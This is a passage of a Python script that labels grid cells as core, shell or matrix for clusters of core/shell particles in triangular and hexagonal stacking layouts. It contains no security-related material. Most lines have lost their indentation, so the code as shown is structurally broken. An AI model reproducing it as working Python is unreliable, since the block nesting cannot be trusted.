b=int(j+(k-1)*Dy1)
ii=1
for h in range(1, Ntam+1):
Npiyw=Npiy-(h-1)
w=Npiyw
Npixg=Npix-(h-1)
g=Npixg
box=0
Npixgg=Npixg
while (w > 0):
box=box+1
g=Npixgg
while (g>0):
div=float(radiusc/dl)
# xa(jj)= (((2*(0)+1+(Npix-1))*radiusc/dl-i+2))
# ya(jj)= (((2*(s-1)+1+(r-1))*radiusc/dl-j+2))
# za(jj)= (((Sqrt(3.0)*(r-1)+1)*radiusc/dl-k+2))
x[ii]= float(((float((2*(g-1)+(box)+(h-1)))*div-i+2)))
y[ii]= float(((float((2*(2-2)+1+(w-1)*sqrt(3.0)+(h-1)))*div-j)+2))
z[ii]= float(((float((sqrt(3.0)*(h-1)+1))*div-k+2)))
if (shape=='sphere'):
[index,aa] = incoreshell_sphere(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
if (shape=='cubic'):
[index,aa] = incoreshell_cubic(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
if (shape=='octahedron'):
	              [index,aa] = incoreshell_octahedron(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
	              if (aa==1):
	                A[i][j+(k-1)*Dy1] = index
g=g-1
ii=ii+1
w=w-1
Npixgg=Npixgg-1
#print A[a][b],a,b
return A
###########################################################################################################################
###########################################################################################################################
# function (or class) that describes which geometry will be chosen.
# for now this is implemented with plain functions
# this one is the geometry with a triangular base
def triangularfcc2in2 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,cs,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs):
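# Triangular layers stacked in pairs (the o loop advances two layers at a time); the h loop
# (1,2) shifts the second sheet of each pair, presumably to emulate fcc-like stacking, before
# the usual core/shell/matrix classification.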
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
ii=1
for o in range (1,int(Ntam/2+1)):
for h in range(1,2+1):
if (h==2):
#f=2*h
f=h+1
Npiyw=Npiy-(f-1)
w=Npiyw
Npixg=Npix-(f-1)
g=Npixg
box=0
Npixgg=Npixg
if(h==1):
Npiyw=Npiy-(h-1)
w=Npiyw
Npixg=Npix-(h-1)
g=Npixg
box=0
Npixgg=Npixg
while (w > 0):
box=box+1
g=Npixgg
while (g>0):
if(h==1):
x[ii]= (((2*(g-1)+(box)+(h-1))*radiusc/dl-i+2))
y[ii]= (((2*(2-1)+(w-1)*sqrt(3.0)+(h-1))*radiusc/dl-j)+2)
z[ii]= (((sqrt(3.0)*(h-1)+1+2*(o-1)*sqrt(3.0))*radiusc/dl-k+2))
if (h==2 ):
#                  print ('here')
x[ii]= (((2*(g-1)+(box)+(f-1))*radiusc/dl-i+2))
y[ii]= (((2*(2-1)+(w-1)*sqrt(3.0)+(f-1))*radiusc/dl-j)+2)
z[ii]= (((sqrt(3.0)*(h-1)+1+2*(o-1)*sqrt(3.0))*radiusc/dl-k+2))
if (shape=='sphere'):
[index,aa] = incoreshell_sphere(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
if (shape=='cubic'):
[index,aa] = incoreshell_cubic(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
if (shape=='octahedron'):
[index,aa] = incoreshell_octahedron(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
if (shape=='triplate'):
[index,aa] = incoreshell_triplate(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z,base,width,height,base2,width2,cs)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
if (shape=='ellipsoidal'):
[index,aa] = incoreshell_ellipsoid(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber,shellnumber,dl,h,x,y,z,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
g=g-1
ii=ii+1
w=w-1
Npixgg=Npixgg-1
return A
###########################################################################################################################
def hex1 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs):
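# Hard-coded cluster of 11 sphere centres (7 in the base hexagonal layer, 3 in the second,
# 1 on top); each centre (xxN, yyN, zzN) is tested against the core, shell and total radii
# and the grid cell in A is labelled corenumber, shellnumber or cnum accordingly.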
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
# print corenumber,shellnumber,cnum
a=int(i)
b=int(j+(k-1)*Dy1)
xx1 = float(((float(3.0*radiusc))/float(dl)-float(i)))
yy1 = float(((float(3.0*radiusc))/float(dl)-float(j)))
zz1 = float(((float(radiusc))/float(dl)-float(k+1)+float(1)))
xx2 = float(((float(2.0*radiusc))/float(dl)-float(i)))
yy2 = float(((float((3.0-sqrt(3.0))*radiusc))/float(dl)-float(j)))
zz2 = float(((float(radiusc))/float(dl)-float(k+1)+float(1)))
xx3 = float(((float(4.0*radiusc))/float(dl)-float(i)))
yy3= float(((float((3.0-sqrt(3.0))*radiusc))/float(dl)-float(j)))
zz3 = float(((float(radiusc))/float(dl)-float(k+1)+float(1)))
xx4 = float(((float(2.0*radiusc))/float(dl)-float(i)))
yy4 = float(((float((3.0+sqrt(3.0))*radiusc))/float(dl)-float(j)))
zz4 = float(((float(radiusc))/float(dl)-float(k+1)+float(1)))
xx5 = float(((float(4.0*radiusc))/float(dl)-float(i)))
yy5 = float(((float((3.0+sqrt(3.0))*radiusc))/float(dl)-float(j)))
zz5 = float(((float(radiusc))/float(dl)-float(k+1)+float(1)))
xx6 = float(((float(1.0*radiusc))/float(dl)-float(i)))
yy6 = float(((float(3.0*radiusc))/float(dl)-float(j)))
zz6 = float(((float(radiusc))/float(dl)-float(k+1)+float(1)))
xx7 = float(((float(5.0*radiusc))/float(dl)-float(i)))
yy7 = float(((float(3.0*radiusc))/float(dl)-float(j)))
zz7 = float(((float(radiusc))/float(dl)-float(k+1)+float(1)))
## second layer
xx8 = float(((float(4.0*radiusc))/float(dl)-float(i)))
yy8 = float(((float(4.0*radiusc))/float(dl)-float(j)))
zz8 = float(((float((1.0+sqrt(3.0))*radiusc))/float(dl)-float(k+1)+float(1)))
xx9 = float(((float(4.0*radiusc))/float(dl)-float(i)))
yy9 = float(((float(2.0*radiusc))/float(dl)-float(j)))
zz9 = float(((float((1.0+sqrt(3.0))*radiusc))/float(dl)-float(k+1)+float(1)))
xx10 = float(((float((3.0-sqrt(3.0)/2)*radiusc))/float(dl)-float(i)))
yy10 = float(((float(3.0*radiusc))/float(dl)-float(j)))
zz10 = float(((float((1.0+sqrt(3.0))*radiusc))/float(dl)-float(k+1)+float(1)))
### third layer
xx11 = float(((float(3.0*radiusc))/float(dl)-float(i)))
yy11 = float(((float(3.0*radiusc))/float(dl)-float(j)))
zz11 = float(((float((1.0+2*sqrt(3.0))*radiusc))/float(dl)-float(k+1)+float(1)))
a=int(i)
b=int(j+(k-1)*Dy1)
div=float(radiusc)/float(dl)
cc=float(((xx1/(div))**2+(yy1/(div))**2+(zz1/(div))**2) )
# print radiuscore,radiusshell,radiusc
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx2/(div))**2+(yy2/(div))**2+(zz2/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx3/(div))**2+(yy3/(div))**2+(zz3/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx4/(div))**2+(yy4/(div))**2+(zz4/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx5/(div))**2+(yy5/(div))**2+(zz5/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx6/(div))**2+(yy6/(div))**2+(zz6/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx7/(div))**2+(yy7/(div))**2+(zz7/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx8/(div))**2+(yy8/(div))**2+(zz8/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx9/(div))**2+(yy9/(div))**2+(zz9/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx10/(div))**2+(yy10/(div))**2+(zz10/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx11/(div))**2+(yy11/(div))**2+(zz11/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
#print A[a][b],a,b
return A
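###########################################################################################################################
# A minimal sketch of the core/shell/matrix test that is repeated inline for every sphere centre in the hex*
# routines; it is not wired into them.  The function name classify_cell and the extra `current` argument are
# illustrative assumptions, not part of the original code; the thresholds mirror the inline checks, and
# rtot = radiuscore + (radiusc - radiuscore) is kept verbatim for parity even though it simplifies to radiusc.
def classify_cell(cx, cy, cz, div, radiusc, radiuscore, radiusshell,
                  corenumber, shellnumber, cnum, current):
    # normalised squared distance of the grid cell from this sphere centre
    cc = (cx / div) ** 2 + (cy / div) ** 2 + (cz / div) ** 2
    rtot = radiuscore + (radiusc - radiuscore)
    out = current                                   # outside the sphere: leave the cell unchanged
    if cc <= (radiuscore / rtot) ** 2:
        out = corenumber                            # inside the core radius
    if (radiuscore / rtot) ** 2 <= cc <= (radiusshell / rtot) ** 2:
        out = shellnumber                           # between the core and shell radii
    if (radiusshell / rtot) ** 2 <= cc <= 1.0:
        out = cnum                                  # between the shell radius and the full sphere
    return out
# Example use inside the loops above (illustrative only):
#   A[a][b] = classify_cell(xx1, yy1, zz1, div, radiusc, radiuscore, radiusshell,
#                           corenumber, shellnumber, cnum, A[a][b])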
###########################################################################################################################
###########################################################################################################################
def hex2 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs):
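# Hard-coded cluster of 14 sphere centres (7 in the base hexagonal layer, 4 in the second,
# 2 in the third, 1 on top); classification is the same core/shell/matrix test as in hex1.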
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
## first layer
a=int(i)
b=int(j+(k-1)*Dy1)
xx1=float((float((3)*radiusc/dl)-float(i)+1))
yy1= float((float((3)*radiusc/dl)-float(j)+1))
zz1=float((float(radiusc/dl)-float(k)+1))
xx2=float((float((3-1.0)*radiusc/dl)-float(i)+1))
yy2= float((float((3-sqrt(3.0)))*radiusc/dl-float(j)+1))
zz2=float((float(radiusc/dl)-float(k)+1))
xx3=float(((3.0+1.0)*float(radiusc/dl)-float(i)+1))
yy3= float(((3.0-sqrt(3.0))*float(radiusc/dl)-j+1))
zz3=float((float(radiusc/dl)-float(k)+1))
xx4=float(((3.0-1.0)*float(radiusc/dl)-float(i)+1))
yy4= float(((3.0+sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz4=float((float(radiusc/dl)-float(k)+1))
xx5=float(((3.0+1.0)*float(radiusc/dl)-float(i)+1))
yy5= float(((3.0+sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz5=float((float(radiusc/dl)-float(k)+1))
xx6=float((1.0*float(radiusc/dl)-float(i)+1))
yy6= float((3.0*float(radiusc/dl)-float(j)+1))
zz6=float((float(radiusc/dl)-float(k)+1))
xx7=float((5.0*float(radiusc/dl)-float(i)+1))
yy7= float((3.0*float(radiusc/dl)-float(j)+1))
zz7=float((float(radiusc/dl)-float(k)+1))
# second layer
xx8=float(((3.0-1.0)*float(radiusc/dl)-float(i)+1))
yy8= float(((3.0)*float(radiusc/dl)-float(j)+1))
zz8=float(((1.0+sqrt(3.0))*float(radiusc/dl)-float(k)+1))
xx9=float(((3+1)*float(radiusc/dl)-float(i)+1))
yy9= float(((3.0)*float(radiusc/dl)-float(j)+1))
zz9= float(((1.0+sqrt(3.0))*float(radiusc/dl)-float(k)+1))
xx10= float(((3.0)*float(radiusc/dl)-float(i)+1))
yy10= float(((3.0-1.0-sqrt(2.0)/2)*float(radiusc/dl)-float(j)+1))
zz10= float(((1.0+sqrt(3.0))*float(radiusc/dl)-float(k)+1))
xx11=float(((3.0)*float(radiusc/dl)-float(i)+1))
yy11= float(((3.0+1.0+sqrt(2.0)/2)*float(radiusc/dl)-float(j)+1))
zz11= float(((1.0+1.0*sqrt(3.0))*float(radiusc/dl)-float(k)+1))
# third layer
xx12= float(((3.0)*float(radiusc/dl)-float(i)+1))
yy12= float(((3.0-sqrt(3.0)/2)*float(radiusc/dl)-float(j)+1))
zz12= float(((1.0+2*sqrt(3.0))*float(radiusc/dl)-float(k)+1))
xx13= float(((3.0)*float(radiusc/dl)-float(i)+1))
yy13= float(((3.0+sqrt(3.0)/2)*float(radiusc/dl)-float(j)+1))
zz13= float(((1.0+2.0*sqrt(3.0))*float(radiusc/dl)-float(k)+1))
# fourth layer
xx14=float(((3.0)*float(radiusc/dl)-float(i)+1))
yy14= float(((3.0)*float(radiusc/dl)-float(j)+1))
zz14=float(((1.0+3.0*sqrt(3.0))*float(radiusc/dl)-float(k)+1))
div=float(radiusc)/float(dl)
cc=float(((xx1/(div))**2+(yy1/(div))**2+(zz1/(div))**2) )
# print radiuscore,radiusshell,radiusc
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx2/(div))**2+(yy2/(div))**2+(zz2/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx3/(div))**2+(yy3/(div))**2+(zz3/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx4/(div))**2+(yy4/(div))**2+(zz4/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx5/(div))**2+(yy5/(div))**2+(zz5/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx6/(div))**2+(yy6/(div))**2+(zz6/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx7/(div))**2+(yy7/(div))**2+(zz7/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx8/(div))**2+(yy8/(div))**2+(zz8/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx9/(div))**2+(yy9/(div))**2+(zz9/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx10/(div))**2+(yy10/(div))**2+(zz10/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx11/(div))**2+(yy11/(div))**2+(zz11/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx12/(div))**2+(yy12/(div))**2+(zz12/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx13/(div))**2+(yy13/(div))**2+(zz13/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx14/(div))**2+(yy14/(div))**2+(zz14/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
return A
###########################################################################################################################
###########################################################################################################################
def hex3 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs):
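# Hard-coded cluster of 12 sphere centres (7 in the base hexagonal layer, 4 in the second,
# 1 on top); classification is the same core/shell/matrix test as in hex1.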
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
xx1=float(((3.0)*float(radiusc/dl)-float(i)+1))
yy1= float(((3.0)*float(radiusc/dl)-float(j)+1))
zz1=float((float(radiusc/dl)-float(k)+1))
xx2= float(((3.0-1.0)*float(radiusc/dl)-float(i)+1))
yy2= float(((3.0-sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz2= float((float(radiusc/dl)-float(k)+1))
xx3=float(((3.0+1.0)*float(radiusc/dl)-float(i)+1))
yy3= float(((3.0-sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz3= float((float(radiusc/dl)-float(k)+1))
xx4= float(((3.0-1.0)*float(radiusc/dl)-float(i)+1))
yy4= float(((3.0+sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz4= float((float(radiusc/dl)-float(k)+1))
xx5= float(((3.0+1.0)*float(radiusc/dl)-float(i)+1))
yy5= float(((3.0+sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz5= float((float(radiusc/dl)-float(k)+1))
xx6=float((1.0*float(radiusc/dl)-float(i)+1))
yy6= float((3.0*float(radiusc/dl)-float(j)+1))
zz6= float((float(radiusc/dl)-float(k)+1))
xx7=float((5.0*float(radiusc/dl)-float(i)+1))
yy7= float((3.0*float(radiusc/dl)-float(j)+1))
zz7= float((float(radiusc/dl)-float(k)+1))
# second layer
xx8= float(((3.0-1.0)*float(radiusc/dl)-float(i)+1))
yy8= float(((3.0)*float(radiusc/dl)-float(j)+1))
zz8= float(((1.0+sqrt(3.0))*float(radiusc/dl)-float(k)+1))
xx9= float(((3.0+1.0)*float(radiusc/dl)-float(i)+1))
yy9= float(((3.0)*float(radiusc/dl)-float(j)+1))
zz9= float(((1+sqrt(3.0))*float(radiusc/dl)-float(k)+1))
xx10= float(((3.0)*float(radiusc/dl)-float(i)+1))
yy10= float(((3.0-1.0-sqrt(2.0)/2)*float(radiusc/dl)-float(j)+1))
zz10= float(((1.0+sqrt(3.0))*float(radiusc/dl)-float(k)+1))
xx11= float(((3.0)*float(radiusc/dl)-float(i)+1))
yy11= float(((3.0+1.0+sqrt(2.0)/2)*float(radiusc/dl)-float(j)+1))
zz11= float(((1.0+1.0*sqrt(3.0))*float(radiusc/dl)-float(k)+1))
# third layer
xx12= float(((3)*float(radiusc/dl)-float(i)+1))
yy12= float(((3)*float(radiusc/dl)-float(j)+1))
zz12= float(((1+2*sqrt(3.0))*float(radiusc/dl)-float(k)+1))
div=float(radiusc)/float(dl)
cc=float(((xx1/(div))**2+(yy1/(div))**2+(zz1/(div))**2) )
# print radiuscore,radiusshell,radiusc
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
